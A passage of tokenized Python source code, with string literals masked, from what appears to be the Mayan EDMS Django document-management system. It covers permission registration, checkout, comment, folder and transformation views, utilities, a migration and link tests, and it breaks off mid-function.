<s> from __future__ import unicode_literals , absolute_import <EOL> import logging <EOL> from permissions . models import StoredPermission <EOL> logger = logging . getLogger ( __name__ ) <EOL> class ModelPermission ( object ) : <EOL> _registry = { } <EOL> _proxies = { } <EOL> _inheritances = { } <EOL> @ classmethod <EOL> def register ( cls , model , permissions ) : <EOL> cls . _registry . setdefault ( model , [ ] ) <EOL> for permission in permissions : <EOL> cls . _registry [ model ] . append ( permission ) <EOL> @ classmethod <EOL> def get_for_instance ( cls , instance ) : <EOL> try : <EOL> permissions = cls . _registry [ type ( instance ) ] <EOL> except KeyError : <EOL> try : <EOL> permissions = cls . _registry [ cls . _proxies [ type ( instance ) ] ] <EOL> except KeyError : <EOL> permissions = ( ) <EOL> pks = [ permission . stored_permission . pk for permission in permissions ] <EOL> return StoredPermission . objects . filter ( pk__in = pks ) <EOL> @ classmethod <EOL> def register_proxy ( cls , source , model ) : <EOL> cls . _proxies [ model ] = source <EOL> @ classmethod <EOL> def register_inheritance ( cls , model , related ) : <EOL> cls . _inheritances [ model ] = related <EOL> @ classmethod <EOL> def get_inheritance ( cls , model ) : <EOL> return cls . _inheritances [ model ] </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> from datetime import timedelta <EOL> from kombu import Exchange , Queue <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from acls import ModelPermission <EOL> from common import MayanAppConfig , menu_facet , menu_main , menu_sidebar <EOL> from documents . models import Document <EOL> from mayan . celery import app <EOL> from rest_api . classes import APIEndPoint <EOL> from . links import ( <EOL> link_checkin_document , link_checkout_document , link_checkout_info , <EOL> link_checkout_list <EOL> ) <EOL> from . literals import CHECK_EXPIRED_CHECK_OUTS_INTERVAL <EOL> from . models import DocumentCheckout <EOL> from . permissions import ( <EOL> permission_document_checkin , permission_document_checkin_override , <EOL> permission_document_checkout <EOL> ) <EOL> from . tasks import task_check_expired_check_outs <EOL> class CheckoutsApp ( MayanAppConfig ) : <EOL> name = '<STR_LIT>' <EOL> test = True <EOL> verbose_name = _ ( '<STR_LIT>' ) <EOL> def ready ( self ) : <EOL> super ( CheckoutsApp , self ) . ready ( ) <EOL> APIEndPoint ( app = self , version_string = '<STR_LIT:1>' ) <EOL> Document . add_to_class ( <EOL> '<STR_LIT>' , <EOL> lambda document , user = None : DocumentCheckout . objects . check_in_document ( document , user ) <EOL> ) <EOL> Document . add_to_class ( <EOL> '<STR_LIT>' , <EOL> lambda document : DocumentCheckout . objects . document_checkout_info ( <EOL> document <EOL> ) <EOL> ) <EOL> Document . add_to_class ( <EOL> '<STR_LIT>' , <EOL> lambda document : DocumentCheckout . objects . document_checkout_state ( <EOL> document <EOL> ) <EOL> ) <EOL> Document . add_to_class ( <EOL> '<STR_LIT>' , <EOL> lambda document : DocumentCheckout . objects . is_document_checked_out ( <EOL> document <EOL> ) <EOL> ) <EOL> ModelPermission . register ( <EOL> model = Document , permissions = ( <EOL> permission_document_checkout , <EOL> permission_document_checkin , <EOL> permission_document_checkin_override , <EOL> ) <EOL> ) <EOL> app . conf . CELERYBEAT_SCHEDULE . update ( <EOL> { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : timedelta ( <EOL> seconds = CHECK_EXPIRED_CHECK_OUTS_INTERVAL <EOL> ) , <EOL> } , <EOL> } <EOL> ) <EOL> app . conf . CELERY_QUEUES . append ( <EOL> Queue ( <EOL> '<STR_LIT>' , Exchange ( '<STR_LIT>' ) , <EOL> routing_key = '<STR_LIT>' , delivery_mode = <NUM_LIT:1> <EOL> ) , <EOL> ) <EOL> app . conf . CELERY_ROUTES . update ( <EOL> { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> } <EOL> ) <EOL> menu_facet . bind_links ( links = ( link_checkout_info , ) , sources = ( Document , ) ) <EOL> menu_main . bind_links ( links = ( link_checkout_list , ) ) <EOL> menu_sidebar . bind_links ( <EOL> links = ( link_checkout_document , link_checkin_document ) , <EOL> sources = ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> ) </s>
<s> from __future__ import unicode_literals <EOL> from django . conf import settings <EOL> from django . utils import timezone , translation <EOL> from . models import UserLocaleProfile <EOL> def user_locale_profile_session_config ( sender , request , user , ** kwargs ) : <EOL> user_locale_profile , created = UserLocaleProfile . objects . get_or_create ( <EOL> user = user <EOL> ) <EOL> if not created and user_locale_profile . timezone and user_locale_profile . language : <EOL> timezone . activate ( user_locale_profile . timezone ) <EOL> translation . activate ( user_locale_profile . language ) <EOL> if hasattr ( request , '<STR_LIT>' ) : <EOL> request . session [ <EOL> translation . LANGUAGE_SESSION_KEY <EOL> ] = user_locale_profile . language <EOL> request . session [ <EOL> settings . TIMEZONE_SESSION_KEY <EOL> ] = user_locale_profile . timezone <EOL> else : <EOL> request . set_cookie ( <EOL> settings . LANGUAGE_COOKIE_NAME , user_locale_profile . language <EOL> ) <EOL> request . set_cookie ( <EOL> settings . TIMEZONE_COOKIE_NAME , user_locale_profile . timezone <EOL> ) <EOL> def user_locale_profile_create ( sender , instance , created , ** kwargs ) : <EOL> if created : <EOL> UserLocaleProfile . objects . create ( user = instance ) </s>
<s> from __future__ import unicode_literals <EOL> import logging <EOL> import os <EOL> import tempfile <EOL> import types <EOL> from django . conf import settings <EOL> from django . utils import formats <EOL> from django . utils . datastructures import MultiValueDict <EOL> from django . utils . encoding import force_text <EOL> from django . utils . http import urlquote as django_urlquote <EOL> from django . utils . http import urlencode as django_urlencode <EOL> logger = logging . getLogger ( __name__ ) <EOL> def copyfile ( source , destination , buffer_size = <NUM_LIT> * <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> source_descriptor = get_descriptor ( source ) <EOL> destination_descriptor = get_descriptor ( destination , read = False ) <EOL> while True : <EOL> copy_buffer = source_descriptor . read ( buffer_size ) <EOL> if copy_buffer : <EOL> destination_descriptor . write ( copy_buffer ) <EOL> else : <EOL> break <EOL> source_descriptor . close ( ) <EOL> destination_descriptor . close ( ) <EOL> def encapsulate ( function ) : <EOL> return lambda : function <EOL> def fs_cleanup ( filename , suppress_exceptions = True ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> os . remove ( filename ) <EOL> except OSError : <EOL> if suppress_exceptions : <EOL> pass <EOL> else : <EOL> raise <EOL> def get_descriptor ( file_input , read = True ) : <EOL> try : <EOL> file_input . seek ( <NUM_LIT:0> ) <EOL> except AttributeError : <EOL> if read : <EOL> return open ( file_input , '<STR_LIT:rb>' ) <EOL> else : <EOL> return open ( file_input , '<STR_LIT:wb>' ) <EOL> else : <EOL> return file_input <EOL> def render_date_object ( date_time_object ) : <EOL> return force_text ( formats . localize ( date_time_object , use_l10n = True ) ) <EOL> def return_attrib ( obj , attrib , arguments = None ) : <EOL> try : <EOL> if isinstance ( attrib , types . FunctionType ) : <EOL> return attrib ( obj ) <EOL> elif isinstance ( <EOL> obj , types . DictType <EOL> ) or isinstance ( obj , types . DictionaryType ) : <EOL> return obj [ attrib ] <EOL> else : <EOL> result = reduce ( getattr , attrib . split ( '<STR_LIT:.>' ) , obj ) <EOL> if isinstance ( result , types . MethodType ) : <EOL> if arguments : <EOL> return result ( ** arguments ) <EOL> else : <EOL> return result ( ) <EOL> else : <EOL> return result <EOL> except Exception as exception : <EOL> if settings . DEBUG : <EOL> return '<STR_LIT>' % ( attrib , exception ) <EOL> else : <EOL> return unicode ( exception ) <EOL> def urlquote ( link = None , get = None ) : <EOL> """<STR_LIT>""" <EOL> if get is None : <EOL> get = [ ] <EOL> assert link or get <EOL> if isinstance ( link , dict ) : <EOL> assert not get , get <EOL> get = link <EOL> link = '<STR_LIT>' <EOL> assert isinstance ( get , dict ) , '<STR_LIT>' % type ( get ) <EOL> if get : <EOL> if isinstance ( get , MultiValueDict ) : <EOL> get = get . lists ( ) <EOL> if link : <EOL> link = '<STR_LIT>' % django_urlquote ( link ) <EOL> return '<STR_LIT>' % ( link , django_urlencode ( get , doseq = True ) ) <EOL> else : <EOL> return django_urlquote ( link ) <EOL> def validate_path ( path ) : <EOL> if not os . path . exists ( path ) : <EOL> try : <EOL> os . mkdir ( path ) <EOL> except Exception as exception : <EOL> logger . debug ( '<STR_LIT>' , exception ) <EOL> return False <EOL> try : <EOL> fd , test_filepath = tempfile . mkstemp ( dir = path ) <EOL> os . close ( fd ) <EOL> os . unlink ( test_filepath ) <EOL> except Exception as exception : <EOL> logger . debug ( '<STR_LIT>' , exception ) <EOL> return False <EOL> return True </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> import logging <EOL> from django . contrib . contenttypes . models import ContentType <EOL> from django . core . exceptions import PermissionDenied <EOL> from django . core . urlresolvers import reverse <EOL> from django . http import Http404 <EOL> from django . shortcuts import get_object_or_404 <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from acls . models import AccessControlList <EOL> from common . views import ( <EOL> SingleObjectCreateView , SingleObjectDeleteView , SingleObjectEditView , <EOL> SingleObjectListView <EOL> ) <EOL> from permissions import Permission <EOL> from . models import Transformation <EOL> from . permissions import ( <EOL> permission_transformation_create , permission_transformation_delete , <EOL> permission_transformation_edit , permission_transformation_view <EOL> ) <EOL> logger = logging . getLogger ( __name__ ) <EOL> class TransformationDeleteView ( SingleObjectDeleteView ) : <EOL> model = Transformation <EOL> def dispatch ( self , request , * args , ** kwargs ) : <EOL> self . transformation = get_object_or_404 ( <EOL> Transformation , pk = self . kwargs [ '<STR_LIT>' ] <EOL> ) <EOL> try : <EOL> Permission . check_permissions ( <EOL> request . user , ( permission_transformation_delete , ) <EOL> ) <EOL> except PermissionDenied : <EOL> AccessControlList . objects . check_access ( <EOL> permission_transformation_delete , request . user , <EOL> self . transformation . content_object <EOL> ) <EOL> return super ( TransformationDeleteView , self ) . dispatch ( <EOL> request , * args , ** kwargs <EOL> ) <EOL> def get_post_action_redirect ( self ) : <EOL> return reverse ( <EOL> '<STR_LIT>' , args = ( <EOL> self . transformation . content_type . app_label , <EOL> self . transformation . content_type . model , <EOL> self . transformation . object_id <EOL> ) <EOL> ) <EOL> def get_extra_context ( self ) : <EOL> return { <EOL> '<STR_LIT>' : self . transformation . content_object , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : reverse ( <EOL> '<STR_LIT>' , args = ( <EOL> self . transformation . content_type . app_label , <EOL> self . transformation . content_type . model , <EOL> self . transformation . object_id <EOL> ) <EOL> ) , <EOL> '<STR_LIT:title>' : _ ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) % { <EOL> '<STR_LIT>' : self . transformation , <EOL> '<STR_LIT>' : self . transformation . content_object <EOL> } , <EOL> '<STR_LIT>' : self . transformation , <EOL> } <EOL> class TransformationCreateView ( SingleObjectCreateView ) : <EOL> fields = ( '<STR_LIT:name>' , '<STR_LIT>' ) <EOL> def dispatch ( self , request , * args , ** kwargs ) : <EOL> content_type = get_object_or_404 ( <EOL> ContentType , app_label = self . kwargs [ '<STR_LIT>' ] , <EOL> model = self . kwargs [ '<STR_LIT>' ] <EOL> ) <EOL> try : <EOL> self . content_object = content_type . get_object_for_this_type ( <EOL> pk = self . kwargs [ '<STR_LIT>' ] <EOL> ) <EOL> except content_type . model_class ( ) . DoesNotExist : <EOL> raise Http404 <EOL> try : <EOL> Permission . check_permissions ( <EOL> request . user , ( permission_transformation_create , ) <EOL> ) <EOL> except PermissionDenied : <EOL> AccessControlList . objects . check_access ( <EOL> permission_transformation_create , request . user , <EOL> self . content_object <EOL> ) <EOL> return super ( TransformationCreateView , self ) . dispatch ( <EOL> request , * args , ** kwargs <EOL> ) <EOL> def form_valid ( self , form ) : <EOL> instance = form . save ( commit = False ) <EOL> instance . content_object = self . content_object <EOL> try : <EOL> instance . full_clean ( ) <EOL> instance . save ( ) <EOL> except : <EOL> return super ( TransformationCreateView , self ) . form_invalid ( form ) <EOL> else : <EOL> return super ( TransformationCreateView , self ) . form_valid ( form ) <EOL> def get_post_action_redirect ( self ) : <EOL> return reverse ( <EOL> '<STR_LIT>' , args = ( <EOL> self . kwargs [ '<STR_LIT>' ] , self . kwargs [ '<STR_LIT>' ] , <EOL> self . kwargs [ '<STR_LIT>' ] <EOL> ) <EOL> ) <EOL> def get_queryset ( self ) : <EOL> return Transformation . objects . get_for_model ( self . content_object ) <EOL> def get_extra_context ( self ) : <EOL> return { <EOL> '<STR_LIT>' : self . content_object , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , ) , <EOL> '<STR_LIT:title>' : _ ( <EOL> '<STR_LIT>' <EOL> ) % self . content_object , <EOL> } <EOL> class TransformationEditView ( SingleObjectEditView ) : <EOL> fields = ( '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> model = Transformation <EOL> def dispatch ( self , request , * args , ** kwargs ) : <EOL> self . transformation = get_object_or_404 ( <EOL> Transformation , pk = self . kwargs [ '<STR_LIT>' ] <EOL> ) <EOL> try : <EOL> Permission . check_permissions ( <EOL> request . user , ( permission_transformation_edit , ) <EOL> ) <EOL> except PermissionDenied : <EOL> AccessControlList . objects . check_access ( <EOL> permission_transformation_edit , request . user , <EOL> self . transformation . content_object <EOL> ) <EOL> return super ( TransformationEditView , self ) . dispatch ( <EOL> request , * args , ** kwargs <EOL> ) <EOL> def form_valid ( self , form ) : <EOL> instance = form . save ( commit = False ) <EOL> try : <EOL> instance . full_clean ( ) <EOL> instance . save ( ) <EOL> except : <EOL> return super ( TransformationEditView , self ) . form_invalid ( form ) <EOL> else : <EOL> return super ( TransformationEditView , self ) . form_valid ( form ) <EOL> def get_post_action_redirect ( self ) : <EOL> return reverse ( <EOL> '<STR_LIT>' , args = ( <EOL> self . transformation . content_type . app_label , <EOL> self . transformation . content_type . model , <EOL> self . transformation . object_id <EOL> ) <EOL> ) <EOL> def get_extra_context ( self ) : <EOL> return { <EOL> '<STR_LIT>' : self . transformation . content_object , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT:title>' : _ ( <EOL> '<STR_LIT>' <EOL> ) % { <EOL> '<STR_LIT>' : self . transformation , <EOL> '<STR_LIT>' : self . transformation . content_object <EOL> } , <EOL> '<STR_LIT>' : self . transformation , <EOL> } <EOL> class TransformationListView ( SingleObjectListView ) : <EOL> def dispatch ( self , request , * args , ** kwargs ) : <EOL> content_type = get_object_or_404 ( <EOL> ContentType , app_label = self . kwargs [ '<STR_LIT>' ] , <EOL> model = self . kwargs [ '<STR_LIT>' ] <EOL> ) <EOL> try : <EOL> self . content_object = content_type . get_object_for_this_type ( <EOL> pk = self . kwargs [ '<STR_LIT>' ] <EOL> ) <EOL> except content_type . model_class ( ) . DoesNotExist : <EOL> raise Http404 <EOL> try : <EOL> Permission . check_permissions ( <EOL> request . user , ( permission_transformation_view , ) <EOL> ) <EOL> except PermissionDenied : <EOL> AccessControlList . objects . check_access ( <EOL> permission_transformation_view , request . user , <EOL> self . content_object <EOL> ) <EOL> return super ( TransformationListView , self ) . dispatch ( <EOL> request , * args , ** kwargs <EOL> ) <EOL> def get_queryset ( self ) : <EOL> return Transformation . objects . get_for_model ( self . content_object ) <EOL> def get_extra_context ( self ) : <EOL> return { <EOL> '<STR_LIT>' : self . content_object , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , ) , <EOL> '<STR_LIT:title>' : _ ( '<STR_LIT>' ) % self . content_object , <EOL> } </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> from django . core . exceptions import PermissionDenied <EOL> from django . core . urlresolvers import reverse <EOL> from django . shortcuts import get_object_or_404 <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from acls . models import AccessControlList <EOL> from common . generics import ( <EOL> SingleObjectCreateView , SingleObjectDeleteView , SingleObjectListView <EOL> ) <EOL> from documents . models import Document <EOL> from permissions import Permission <EOL> from . models import Comment <EOL> from . permissions import ( <EOL> permission_comment_create , permission_comment_delete , <EOL> permission_comment_view <EOL> ) <EOL> class DocumentCommentCreateView ( SingleObjectCreateView ) : <EOL> fields = ( '<STR_LIT>' , ) <EOL> model = Comment <EOL> object_verbose_name = _ ( '<STR_LIT>' ) <EOL> def dispatch ( self , request , * args , ** kwargs ) : <EOL> try : <EOL> Permission . check_permissions ( <EOL> request . user , ( permission_comment_create , ) <EOL> ) <EOL> except PermissionDenied : <EOL> AccessControlList . objects . check_access ( <EOL> permission_comment_create , request . user , self . get_document ( ) <EOL> ) <EOL> return super ( <EOL> DocumentCommentCreateView , self <EOL> ) . dispatch ( request , * args , ** kwargs ) <EOL> def get_document ( self ) : <EOL> return get_object_or_404 ( Document , pk = self . kwargs [ '<STR_LIT>' ] ) <EOL> def get_extra_context ( self ) : <EOL> return { <EOL> '<STR_LIT:object>' : self . get_document ( ) , <EOL> '<STR_LIT:title>' : _ ( '<STR_LIT>' ) % self . get_document ( ) , <EOL> } <EOL> def get_instance_extra_data ( self ) : <EOL> return { <EOL> '<STR_LIT>' : self . get_document ( ) , '<STR_LIT:user>' : self . request . user , <EOL> } <EOL> def get_save_extra_data ( self ) : <EOL> return { <EOL> '<STR_LIT>' : self . request . user , <EOL> } <EOL> def get_post_action_redirect ( self ) : <EOL> return reverse ( <EOL> '<STR_LIT>' , args = ( self . kwargs [ '<STR_LIT>' ] , ) <EOL> ) <EOL> class DocumentCommentDeleteView ( SingleObjectDeleteView ) : <EOL> model = Comment <EOL> def dispatch ( self , request , * args , ** kwargs ) : <EOL> try : <EOL> Permission . check_permissions ( <EOL> request . user , ( permission_comment_delete , ) <EOL> ) <EOL> except PermissionDenied : <EOL> AccessControlList . objects . check_access ( <EOL> permission_comment_delete , request . user , <EOL> self . get_object ( ) . document <EOL> ) <EOL> return super ( <EOL> DocumentCommentDeleteView , self <EOL> ) . dispatch ( request , * args , ** kwargs ) <EOL> def get_delete_extra_data ( self ) : <EOL> return { '<STR_LIT>' : self . request . user } <EOL> def get_extra_context ( self ) : <EOL> return { <EOL> '<STR_LIT:object>' : self . get_object ( ) . document , <EOL> '<STR_LIT:title>' : _ ( '<STR_LIT>' ) % self . get_object ( ) , <EOL> } <EOL> def get_post_action_redirect ( self ) : <EOL> return reverse ( <EOL> '<STR_LIT>' , <EOL> args = ( self . get_object ( ) . document . pk , ) <EOL> ) <EOL> class DocumentCommentListView ( SingleObjectListView ) : <EOL> def get_document ( self ) : <EOL> return get_object_or_404 ( Document , pk = self . kwargs [ '<STR_LIT>' ] ) <EOL> def get_queryset ( self ) : <EOL> try : <EOL> Permission . check_permissions ( <EOL> self . request . user , ( permission_comment_view , ) <EOL> ) <EOL> except PermissionDenied : <EOL> AccessControlList . objects . check_access ( <EOL> permission_comment_view , self . request . user , <EOL> self . get_document ( ) <EOL> ) <EOL> return self . get_document ( ) . comments . all ( ) <EOL> def get_extra_context ( self ) : <EOL> return { <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:object>' : self . get_document ( ) , <EOL> '<STR_LIT:title>' : _ ( '<STR_LIT>' ) % self . get_document ( ) , <EOL> } </s>
<s> from __future__ import unicode_literals <EOL> from django . utils . html import mark_safe <EOL> from django . utils . translation import ugettext <EOL> from . models import IndexInstanceNode <EOL> def get_instance_link ( index_instance_node , text = None , simple = False ) : <EOL> """<STR_LIT>""" <EOL> if simple : <EOL> template = '<STR_LIT>' <EOL> else : <EOL> template = '<STR_LIT>' <EOL> return template % { <EOL> '<STR_LIT:url>' : index_instance_node . get_absolute_url ( ) , <EOL> '<STR_LIT:value>' : text if text else ( <EOL> index_instance_node if index_instance_node . parent else index_instance_node . index_template_node . index <EOL> ) <EOL> } <EOL> def get_breadcrumbs ( index_instance_node , simple = False , single_link = False , include_count = False ) : <EOL> """<STR_LIT>""" <EOL> result = [ ] <EOL> if single_link : <EOL> simple = True <EOL> for instance in index_instance_node . get_ancestors ( ) : <EOL> result . append ( get_instance_link ( instance , simple = simple ) ) <EOL> result . append ( get_instance_link ( index_instance_node , simple = simple ) ) <EOL> output = [ ] <EOL> if include_count : <EOL> output . append ( '<STR_LIT>' % index_instance_node . documents . count ( ) ) <EOL> if single_link : <EOL> output . insert ( <EOL> <NUM_LIT:0> , get_instance_link ( <EOL> index_instance_node = index_instance_node , text = ( <EOL> '<STR_LIT>' . join ( result ) <EOL> ) <EOL> ) <EOL> ) <EOL> return mark_safe ( '<STR_LIT:U+0020>' . join ( output ) ) <EOL> else : <EOL> output . insert ( <NUM_LIT:0> , '<STR_LIT>' . join ( result ) ) <EOL> return mark_safe ( '<STR_LIT:U+0020>' . join ( output ) ) <EOL> def index_instance_item_link ( index_instance_item ) : <EOL> if isinstance ( index_instance_item , IndexInstanceNode ) : <EOL> if index_instance_item . index_template_node . link_documents : <EOL> icon_template = '<STR_LIT>' <EOL> else : <EOL> icon_template = '<STR_LIT>' <EOL> else : <EOL> icon_template = '<STR_LIT>' <EOL> return mark_safe ( <EOL> '<STR_LIT>' % { <EOL> '<STR_LIT:url>' : index_instance_item . get_absolute_url ( ) , <EOL> '<STR_LIT>' : icon_template , <EOL> '<STR_LIT:text>' : index_instance_item <EOL> } <EOL> ) <EOL> def node_level ( node ) : <EOL> """<STR_LIT>""" <EOL> return mark_safe ( <EOL> '<STR_LIT>' . join ( <EOL> [ <EOL> '<STR_LIT>' * ( <EOL> getattr ( node , node . _mptt_meta . level_attr ) - <NUM_LIT:1> <EOL> ) , '<STR_LIT>' if node . is_root_node ( ) else '<STR_LIT>' , <EOL> ugettext ( '<STR_LIT>' ) if node . is_root_node ( ) else unicode ( node ) <EOL> ] <EOL> ) <EOL> ) </s>
<s> from __future__ import unicode_literals <EOL> TEST_WORKFLOW_LABEL = '<STR_LIT>' <EOL> TEST_WORKFLOW_INITIAL_STATE_LABEL = '<STR_LIT>' <EOL> TEST_WORKFLOW_INITIAL_STATE_COMPLETION = <NUM_LIT> <EOL> TEST_WORKFLOW_STATE_LABEL = '<STR_LIT>' <EOL> TEST_WORKFLOW_STATE_COMPLETION = <NUM_LIT> <EOL> TEST_WORKFLOW_TRANSITION_LABEL = '<STR_LIT>' </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT:label>' , <EOL> field = models . CharField ( <EOL> unique = True , max_length = <NUM_LIT:32> , verbose_name = '<STR_LIT>' <EOL> ) , <EOL> preserve_default = True , <EOL> ) , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> from django . core . files import File <EOL> from django . core . urlresolvers import reverse <EOL> from acls . models import AccessControlList <EOL> from user_management . tests . literals import ( <EOL> TEST_USER_PASSWORD , TEST_USER_USERNAME <EOL> ) <EOL> from . . links import ( <EOL> link_document_version_download , link_document_version_revert <EOL> ) <EOL> from . . permissions import ( <EOL> permission_document_download , permission_document_version_revert <EOL> ) <EOL> from . literals import TEST_SMALL_DOCUMENT_PATH <EOL> from . test_views import GenericDocumentViewTestCase <EOL> class DocumentsLinksTestCase ( GenericDocumentViewTestCase ) : <EOL> def test_document_version_revert_link_no_permission ( self ) : <EOL> with open ( TEST_SMALL_DOCUMENT_PATH ) as file_object : <EOL> self . document . new_version ( file_object = File ( file_object ) ) <EOL> self . assertTrue ( self . document . versions . count ( ) , <NUM_LIT:2> ) <EOL> self . login ( username = TEST_USER_USERNAME , password = TEST_USER_PASSWORD ) <EOL> self . add_test_view ( test_object = self . document . versions . first ( ) ) <EOL> context = self . get_test_view ( ) <EOL> resolved_link = link_document_version_revert . resolve ( context = context ) <EOL> self . assertEqual ( resolved_link , None ) <EOL> def test_document_version_revert_link_with_permission ( self ) : <EOL> with open ( TEST_SMALL_DOCUMENT_PATH ) as file_object : <EOL> self . document . new_version ( file_object = File ( file_object ) ) <EOL> self . assertTrue ( self . document . versions . count ( ) , <NUM_LIT:2> ) <EOL> self . login ( username = TEST_USER_USERNAME , password = TEST_USER_PASSWORD ) <EOL> acl = AccessControlList . objects . create ( <EOL> content_object = self . document , role = self . role <EOL> ) <EOL> acl . permissions . add ( <EOL> permission_document_version_revert . stored_permission <EOL> ) <EOL> self . add_test_view ( test_object = self . document . versions . first ( ) ) <EOL> context = self . get_test_view ( ) <EOL> resolved_link = link_document_version_revert . resolve ( context = context ) <EOL> self . assertNotEqual ( resolved_link , None ) <EOL> self . assertEqual ( <EOL> resolved_link . url , <EOL> reverse ( <EOL> '<STR_LIT>' , <EOL> args = ( self . document . versions . first ( ) . pk , ) <EOL> ) <EOL> ) <EOL> def test_document_version_download_link_no_permission ( self ) : <EOL> self . login ( username = TEST_USER_USERNAME , password = TEST_USER_PASSWORD ) <EOL> self . add_test_view ( test_object = self . document . latest_version ) <EOL> context = self . get_test_view ( ) <EOL> resolved_link = link_document_version_download . resolve ( context = context ) <EOL> self . assertEqual ( resolved_link , None ) <EOL> def test_document_version_download_link_with_permission ( self ) : <EOL> self . login ( username = TEST_USER_USERNAME , password = TEST_USER_PASSWORD ) <EOL> acl = AccessControlList . objects . create ( <EOL> content_object = self . document , role = self . role <EOL> ) <EOL> acl . permissions . add ( permission_document_download . stored_permission ) <EOL> self . add_test_view ( test_object = self . document . latest_version ) <EOL> context = self . get_test_view ( ) <EOL> resolved_link = link_document_version_download . resolve ( context = context ) <EOL> self . assertNotEqual ( resolved_link , None ) <EOL> self . assertEqual ( <EOL> resolved_link . url , <EOL> reverse ( <EOL> '<STR_LIT>' , <EOL> args = ( self . document . latest_version . pk , ) <EOL> ) <EOL> ) </s>
<s> from __future__ import unicode_literals <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from actstream . models import Action <EOL> from common import MayanAppConfig , menu_tools <EOL> from common . classes import Package <EOL> from navigation import SourceColumn <EOL> from . links import link_events_list <EOL> from . widgets import event_type_link <EOL> class EventsApp ( MayanAppConfig ) : <EOL> name = '<STR_LIT>' <EOL> verbose_name = _ ( '<STR_LIT>' ) <EOL> def ready ( self ) : <EOL> super ( EventsApp , self ) . ready ( ) <EOL> Package ( label = '<STR_LIT>' , license_text = '''<STR_LIT>''' ) <EOL> SourceColumn ( <EOL> source = Action , label = _ ( '<STR_LIT>' ) , attribute = '<STR_LIT>' <EOL> ) <EOL> SourceColumn ( source = Action , label = _ ( '<STR_LIT>' ) , attribute = '<STR_LIT>' ) <EOL> SourceColumn ( <EOL> source = Action , label = _ ( '<STR_LIT>' ) , <EOL> func = lambda context : event_type_link ( context [ '<STR_LIT:object>' ] ) <EOL> ) <EOL> menu_tools . bind_links ( links = ( link_events_list , ) ) </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> import logging <EOL> from django . conf import settings <EOL> from django . contrib import messages <EOL> from django . core . exceptions import PermissionDenied <EOL> from django . core . urlresolvers import reverse , reverse_lazy <EOL> from django . http import HttpResponseRedirect <EOL> from django . shortcuts import get_object_or_404 , render_to_response <EOL> from django . template import RequestContext <EOL> from django . utils . translation import ugettext_lazy as _ , ungettext <EOL> from acls . models import AccessControlList <EOL> from common . views import ( <EOL> SingleObjectCreateView , SingleObjectEditView , SingleObjectListView <EOL> ) <EOL> from documents . permissions import permission_document_view <EOL> from documents . models import Document <EOL> from documents . views import DocumentListView <EOL> from permissions import Permission <EOL> from . forms import FolderListForm <EOL> from . models import Folder <EOL> from . permissions import ( <EOL> permission_folder_add_document , permission_folder_create , <EOL> permission_folder_delete , permission_folder_edit , permission_folder_view , <EOL> permission_folder_remove_document <EOL> ) <EOL> logger = logging . getLogger ( __name__ ) <EOL> class FolderEditView ( SingleObjectEditView ) : <EOL> fields = ( '<STR_LIT:label>' , ) <EOL> model = Folder <EOL> object_permission = permission_folder_edit <EOL> post_action_redirect = reverse_lazy ( '<STR_LIT>' ) <EOL> def get_extra_context ( self ) : <EOL> return { <EOL> '<STR_LIT:object>' : self . get_object ( ) , <EOL> '<STR_LIT:title>' : _ ( '<STR_LIT>' ) % self . get_object ( ) , <EOL> } <EOL> class FolderListView ( SingleObjectListView ) : <EOL> object_permission = permission_folder_view <EOL> def get_extra_context ( self ) : <EOL> return { <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:title>' : _ ( '<STR_LIT>' ) , <EOL> } <EOL> def get_folder_queryset ( self ) : <EOL> return Folder . objects . all ( ) <EOL> def get_queryset ( self ) : <EOL> self . queryset = self . get_folder_queryset ( ) <EOL> return super ( FolderListView , self ) . get_queryset ( ) <EOL> class FolderCreateView ( SingleObjectCreateView ) : <EOL> fields = ( '<STR_LIT:label>' , ) <EOL> model = Folder <EOL> view_permission = permission_folder_create <EOL> def form_valid ( self , form ) : <EOL> try : <EOL> Folder . objects . get ( <EOL> label = form . cleaned_data [ '<STR_LIT:label>' ] , user = self . request . user <EOL> ) <EOL> except Folder . DoesNotExist : <EOL> instance = form . save ( commit = False ) <EOL> instance . user = self . request . user <EOL> instance . save ( ) <EOL> return super ( FolderCreateView , self ) . form_valid ( form ) <EOL> else : <EOL> messages . error ( <EOL> self . request , <EOL> _ ( <EOL> '<STR_LIT>' <EOL> ) % form . cleaned_data [ '<STR_LIT:label>' ] <EOL> ) <EOL> return super ( FolderCreateView , self ) . form_invalid ( form ) <EOL> def get_extra_context ( self ) : <EOL> return { <EOL> '<STR_LIT:title>' : _ ( '<STR_LIT>' ) , <EOL> } <EOL> def folder_delete ( request , folder_id ) : <EOL> folder = get_object_or_404 ( Folder , pk = folder_id ) <EOL> try : <EOL> Permission . check_permissions ( request . user , ( permission_folder_delete , ) ) <EOL> except 